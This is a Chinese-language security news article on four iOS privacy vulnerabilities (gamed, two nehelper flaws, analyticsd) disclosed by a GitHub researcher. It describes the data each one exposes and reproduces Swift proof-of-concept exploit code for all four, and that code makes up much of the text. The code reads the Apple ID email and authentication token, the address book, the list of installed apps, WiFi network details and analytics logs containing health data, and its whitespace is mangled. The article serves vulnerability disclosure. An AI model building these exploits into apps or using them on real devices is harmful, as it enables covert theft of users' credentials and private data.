研究人员发现了三个iOS 0 day漏洞PoC代码。
GitHub用户illusionofchaos在GitHub上发布了4个iOS 安全漏洞PoC代码包括3个0 day这四个漏洞分别是:
- Gamed 0-day
- Nehelper Enumerate Installed Apps 0-day
- Nehelper Wifi Info 0-day
- Analyticsd (iOS 14.7中已修复)
Gamed 0-day
从APP store在用户不知情的情况下,按住该应用程序可以访问以下信息:
- Apple ID邮箱和Apple ID账户全名;
- Apple ID认证token,允许以用户名义访问*.apple.com至少一个终端;
- Core Duet完整的数据库文件系统读取权限,包括邮箱,SMS、iMessage和第3方消息APP与这些联系人交互的联系人和元数据;
- 快速拨号数据库和地址簿数据库的完全文件系统读权限,包括联系人图片和其他元数据;
PoC代码如下:
letconnection=NSXPCConnection(machServiceName:"com.apple.gamed",options:NSXPCConnection.Options.privileged)!letproxy=connection.remoteObjectProxyWithErrorHandler({_in})as!GKDaemonProtocolletpid=ProcessInfo.processInfo.processIdentifierproxy.getServicesForPID(pid,localPlayer:nil,reply:{(accountService,_,_,_,_,_,_,_,utilityService,_,_,_,_)inaccountService.authenticatePlayerWithExistingCredentials(handler:{response,errorinletappleID=response.credential.accountNamelettoken=response.credential.authenticationToken}utilityService.requestImageData(for:URL(fileURLWithPath:"/var/mobile/Library/AddressBook/AddressBook.sqlitedb"),subdirectory:nil,fileName:nil,handler:{datainletaddressBookData=data}}Nehelper Enumerate Installed Apps 0-day
该漏洞允许任何用户安装APP确定安装在设备上APP是否给定bundle ID。XPC终端com.apple.nehelper 有一次访问APP可以接受的方法bundle ID作为参数,返回含有缓存UUID数组,缓存UUID可用于安装在设备上的应用bundle ID配对。具体参见/usr/libexec/nehelper的[NEHelperCacheManager onQueueHandleMessage:] :
funcisAppInstalled(bundleId:String)->Bool{letconnection=xpc_connection_create_mach_service("com.apple.nehelper",nil,2)!xpc_connection_set_event_handler(connection,{_in})xpc_connection_resume(connection)letxdict=xpc_dictionary_create(nil,nil,0)xpc_dictionary_set_uint64(xdict,"delegate-class-id",1)xpc_dictionary_set_uint64(xdict,"cache-command",3)xpc_dictionary_set_string(xdict,"cache-signing-identifier",bundleId)letreply=xpc_connection_send_message_with_reply_sync(connection,xdict)ifletresultData=xpc_dictionary_get_value(reply,"result-data"),xpc_dictionary_get_value(resultData,"cache-app-uuid")!=nil{returntrue}returnfalse}Nehelper Wifi Info 0-day
XPC终端com.apple.nehelper接收用户提供的参数sdk-version,若该值小于后等于524288,com.apple.developer.networking.wifi-info entiltlement就会跳过。这使得任何符合条件的APP不需要就可以了entiltlement获取WiFi信息。
funcwifi_info()->String?{letconnection=xpc_connection_create_mach_service("com.apple.nehelper",nil,2)xpc_connection_set_event_handler(connection,{_in})xpc_connection_resume(connection)letxdict=xpc_dictionary_create(nil,nil,0)xpc_dictionary_set_uint64(xdict,"delegate-class-id",10)xpc_dictionary_set_uint64(xdict,"sdk-version",1)//maybeomittedentirelyxpc_dictionary_set_string(xdict,"interface-name","en0")letreply=xpc_connection_send_message_with_reply_sync(connection,xdict)ifletresult=xpc_dictionary_get_value(reply,"result-data"){letssid=String(cString:xpc_dictionary_get_string(result,"SSID"))letbssid=String(cString:xpc_dictionary_get_string(result,"BSSID"))return"SSID:\(ssid)\nBSSID:\(bssid)"}else{returnnil}}Analyticsd (iOS 14.7中已修复)
该漏洞允许任何用户安装APP访问分析日志。这些日志包含以下信息:
- 医疗信息,包括心跳、异常心律事件等;
- 设备使用信息,包括推送通知和用户行为;
- 屏幕时间信息及给定bundle ID所有有用的会话数;
- Safari用户查看web页面语言;
- 设备配件的信息包括制造商、型号、固件版本和用户分配的名称;
funcanalytics_json()->String?{letconnection=xpc_connection_create_mach_service("com.apple.analyticsd",nil,2)xpc_connection_set_event_handler(connection,{_in})xpc_connection_resume(connection)letxdict=xpc_dictionary_create(nil,nil,0)xpc_dictionary_set_string(xdict,"command","log-dump");letreply=xpc_connection_send_message_with_reply_sync(connection,xdict);returnxpc_dictionary_get_string(reply,"log-dump");}更多参见:https://habr.com/ru/post/579714/